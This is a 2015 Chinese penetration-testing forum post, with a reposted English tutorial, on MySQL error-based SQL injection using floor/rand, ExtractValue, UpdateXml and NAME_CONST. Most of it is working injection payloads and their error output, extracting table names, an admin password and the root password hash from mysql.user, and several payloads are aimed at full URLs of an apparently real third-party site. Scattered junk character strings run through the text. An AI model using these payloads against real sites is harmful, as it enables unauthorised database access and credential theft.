中国网络渗透测试联盟
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin 时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
8 O# V- C" p1 d' A首先进行正常查询:
mysql> select * from article where id = 1;8 N: t, W% r, J1 G& @1 M
+—-+——-+———+
) ]' D5 A2 \- L$ w& L| id | title | content |! u1 l0 z! {: N6 G0 c
+—-+——-+———+0 Z) N M9 U2 p, W* y c! w8 N9 T
| 1 | test | do it |/ Y3 [# j, \6 o
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);/ d0 e7 F k: X' ?: B e+ ?
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 b- W+ b2 z. I7 V% |/ x
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
0 Q% I3 r0 D4 ~' J* l' ]: jERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));- s g' j8 m: q& c/ K
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
2、ExtractValue
8 C2 |" P' G5 H2 x# N! ?测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
$ {7 k- G. \5 z' @( d2 {ERROR 1105 (HY000): XPATH syntax error: ’\admin888′
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
1 F3 j3 w) x/ a) I4 U2 U s% M3 x# W; e' s' S; d3 g
再收集:
; }# k+ Y. |" M/ j: L6 a' _
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # G& E2 n% N" A9 I1 U: r* A7 T
: B: G; W. C5 j$ ~9 eError
uplicate column name ‘5.0.27-community-nt’Error
uplicate column name ‘5.0.27-community-nt’
$ y/ P- T: m+ f! ? P/ V1 i' Z/ `! v4 c6 I
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)2 p* j, G1 Q# a1 `, W
- L: Q8 P* B% ], {- U& ^
Error
uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error
uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
* h9 L W5 |+ ~, Q: _* L8 R4 R" ]9 ^ _; s0 m+ @8 v$ Z, Z
MYSQL高版本报错注入技巧-利用NAME_CONST注入! b3 J& H8 [* d7 E; O8 w" ~
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. # y- W; `: w1 _+ T- z% A
5 t' L0 F P) K
3 ?0 n7 M2 ]" V6 e4 W* k相关信息
9 _2 |. y! \* n' y3 i% N+ F/ z# d2 [, n4 J6 f( D b
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
& M" L% x. O2 M1 \/ P1 x( q% B2 x P" F6 m) A1 Y% E# W- n
Code:2 U4 K( t/ ^- K! W! k
NAME_CONST(DATA, VALUE)* j2 e2 r( g0 M' [* i% b5 m9 T1 j& U
5 |0 r3 R$ I- U9 _4 {Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
% X9 c" ?! f: W0 a+ z3 z2 _1 k& |# f
SELECT NAME_CONST('TEST', 1)& o, K9 s( g( m) s5 P
$ b- s: s2 t' v, j% Z
7 [8 |& Q+ I1 e# E2 @4 i& x- H0 E
' N, _5 k% p6 g0 R8 P2 \# F|---------------|# G9 c; ?; w) X1 ?5 _
| TEST |
1 d& a8 }% g! y! Z: ?| |4 {4 v1 X' C+ Y: p1 X2 X
|---------------|$ S$ S+ a: j5 |9 Y
| 1 |# K" {+ P: }7 ?; A, n8 K
| |
* w; }0 C( k5 G' N9 C, u|---------------|
# ?4 D$ E) D1 r$ a- N, ]) x" b
, w# g# v; Z! p7 M ^
* G0 T2 ^; m F* F& n0 O; N9 Z. ?* b0 F: \3 A2 j
0 a! b) r/ L. g; [http://dev.mysql.com/doc/refman/5.0/en/m...name-const! B4 m: `- X1 P# M+ s
Intro to MySQL Variables
4 p: Q6 ]. H6 p7 ~( [ A" A; L6 U1 k |3 y6 e$ m
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
* q8 z# N7 L( | V6 O0 D9 c6 q# |9 N# h! l, f& r2 [: \( v
Code:
* I5 e' {& F v. u6 M% D Fhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
0 b$ i! [9 I7 s4 w6 U$ C+ Q& f2 ^' M8 q* e) r5 V6 C
6 |% Y5 p2 K$ I& p2 f; S
1 P, O& c; N" F6 a9 K5 Y: P
: P, {5 w- ^2 x& m: P' H, Q3 E/ S6 w' i: B
Code:
- z4 t$ K4 d! {- ~; ~7 R) S" p: pand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
. r# W* l" V w4 A; g. B: _& ]
r8 S3 q% |& `' s Y
+ q+ n. w5 p& [1 R2 d! pVAR = Your MySQL variable.
0 p+ w* ?0 y u0 Q( b
0 k5 R8 V! k% S4 M" lMySQL 5.1.3 Server System Variables
! ]$ {8 @* t; I, y$ v. c) l0 Z) R3 x6 {2 B$ ~$ f* @+ F
Let's try it out on my site..
5 B$ f! y( c6 b. k+ ?
* i8 \7 j5 G1 `* y a7 TCode:
* \, W6 }- Z% Ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--; Z4 G9 s1 i1 N1 O
- n9 a: o$ Q# m5 T0 V$ A
Error
uplicate column name '5.0.27-community-nt'
1 I6 A/ b. {, v( L
7 {" o/ u$ b. O( g3 T- F1 w& B. i; T0 C4 i4 I% z0 A* }: i
( K* y3 z1 d" p7 K: E. O- o
" u$ g3 B* G$ @3 l4 ^' M3 e; f
2 j2 F3 S. j/ W1 p) f8 ?3 Y* W
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again.../ t; E2 l# I. L \( C+ T5 o
" l( A3 B6 q) u/ p+ V, P* QData Extraction9 V* k P" w8 C$ R$ w* Z
* }5 ~1 Q, W2 J9 ]) PCode:( Y( {2 F; F0 \$ ]
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--' p1 ?4 r+ T; [: D2 P( G7 v
2 B3 ] ]5 z% K% l9 o* d7 K
# |! a2 W4 F; ^4 s# o: G0 aWe should get a duplicate column 1 error...' e9 I0 R; _* ^% m/ D( l7 A
6 \( |9 z) H3 R+ }, P( T1 }Code:2 B" p1 z \* c8 l0 u# ~. z' |
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
! S3 _; {0 w& `8 ?" Q! k0 d! E D# }2 d# V/ N O2 E6 f
Error
uplicate column name '1
, ?( _& F0 r/ Q) w6 x% J1 p3 E9 H$ }4 w0 |3 A! q3 e
# _: z# j+ K# v9 i0 w! o# M7 p
6 u2 N& |" a$ _8 X; [3 E/ G9 t* v: |% q0 z% b% [
$ E3 W/ W+ z0 ?: W9 Y: C3 ~5 p! q
: y+ B6 A7 }1 X @+ }6 iNow let's get the tables out this bitch..
. Y1 J2 g% l' ]" c( M+ R5 i. f" O, B2 Z2 Y# c2 w. H. g
Code: P9 D) x8 M, Z/ t( V
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* E3 ^, d5 _& \0 N. p* x
0 d: m! O! U5 I- R: l. z
& h7 ?. ]1 {* n2 NLet's see if it works here, if it does, we can go on and finish the job.
' r! n) `" @' B
. y: `6 W! M6 \8 G9 ~3 ]Code:$ ~- X0 P- L1 e$ m: c7 {+ Z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--1 e+ _& v4 L" f1 g9 ]
) s6 {0 k0 b0 v
+ r- Q. o% ?0 N& x: P5 n6 v2 iError
uplicate column name 'com_admanage
3 O6 N5 n/ c1 d: O4 b; t: T8 h# J4 y" ]8 l
& T- D7 X7 K* d6 K* R; Y$ V! r: d2 H
9 V' \8 U' n/ Z* V0 e3 V- X
2 R" K! i3 t6 U4 ^* |
# n6 _0 r5 |3 X {1 X9 G. r, MNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
# J# T: O) W7 P# S" ?
: y& ^. K( A, z! P0 A- `Let's get the columns out of the user table..) k# H7 B5 t# a8 Y
( G% _7 K% K/ f6 m2 u @Code:- b: R( I3 J7 ?# i& V$ I: ?
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
+ R& U4 {+ [- M, c. ?2 `/ K* T, \" J/ G) c; `
& m2 N6 S4 F# S
So mine looks like this, and I get the duplicate column name 'Host'.
4 t7 G, _' N% U: R8 w* B2 V- v0 I) @3 k" ^! X3 [
Code:6 Q, z( B5 a! m' Z) s
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
9 g" n, q) r0 B+ w1 a( H/ L% ^
+ l$ m0 o) O& y4 N& ZError
uplicate column name 'Host'! z( J1 Y9 w% v ~) ]; ^$ l, p4 [
% H, Q# a. l0 `4 x$ a$ M. b* i- ?9 C8 F" o
4 K* U+ P+ ^, D5 c' u; H
7 ~2 _7 V4 b/ B. ?! |
+ t! j1 {; j) o1 `, X+ ^# }4 V6 D0 D( w- C& y1 a
Woot, time to finish this bitch off.
/ s7 g2 e7 }$ [/ s
6 X/ p, p2 q) C8 [Code:1 L4 Y( ] g7 C4 k# g2 A9 Y
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--6 l! X# k. z" b' _7 e" z3 t
# e/ r" }/ V7 l. D
( e4 q& i7 [6 ]& ]# U3 fSo mine looks like this...
' G0 z& s# m" E8 M6 b
; m1 L/ G: j& [* E' D( aCode:
& B j- v2 D. Q- [http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--, M& p: d# H2 o
7 Q& Q1 ^$ [5 k( {( ~( {
Error
uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
+ T5 ]; y1 s: W, r8 U
2 J6 j. j9 t' f, y; G$ K5 i% l* W! `3 M5 \! n: p/ a6 Z! n/ u
2 j( g6 J7 j3 p# M1 P
2 }) L$ s. g* v0 Q! L8 ]+ q1 f2 i( B w
# H# S- h' Q* n4 _- _
i$ v7 g1 V- C$ e$ U6 w: p0 I3 L
And there we have it, thanks for reading.
' W4 B8 O: W# C/ C& V P+ z8 x1 n& d5 `% Z) ~* N
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) |
Powered by Discuz! X3.2 |